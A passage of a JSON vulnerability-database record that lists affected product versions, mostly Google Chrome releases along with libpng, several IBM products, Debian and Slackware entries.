"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1678.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.704.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.149"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1291.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.632.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.158"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.154"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.328"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.889.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.34"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.899.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.571.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1677.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.911.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.734.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.954.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.667.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1310.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.342"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.93"
},
{
"_id": null,
"model": "websphere real time sr",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.678.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.638.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.949.0"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.710.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1685.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.735.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.568.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.129"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.590.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.113"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.827.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.23"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.953.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.666.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1071.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1013.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.2"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.50"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.43"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.47"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1285.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.779.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.121"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.127"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.110"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.35"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.612.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1035.0"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.165.4"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.767.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.891.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1001.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1014.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.220"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.210"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.142"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.911.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.620.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.576.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1015.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.213"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "42.0.2311.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1010.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.148"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.99"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1682.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.751.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.636.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.313"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1670.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.831.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.18"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.111"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.67"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.165.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1305.2"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.583.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.595.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.131"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.866.0"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1673.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.131"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.128"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.653.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1656.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.713.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.643.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1057.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.228"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.2"
},
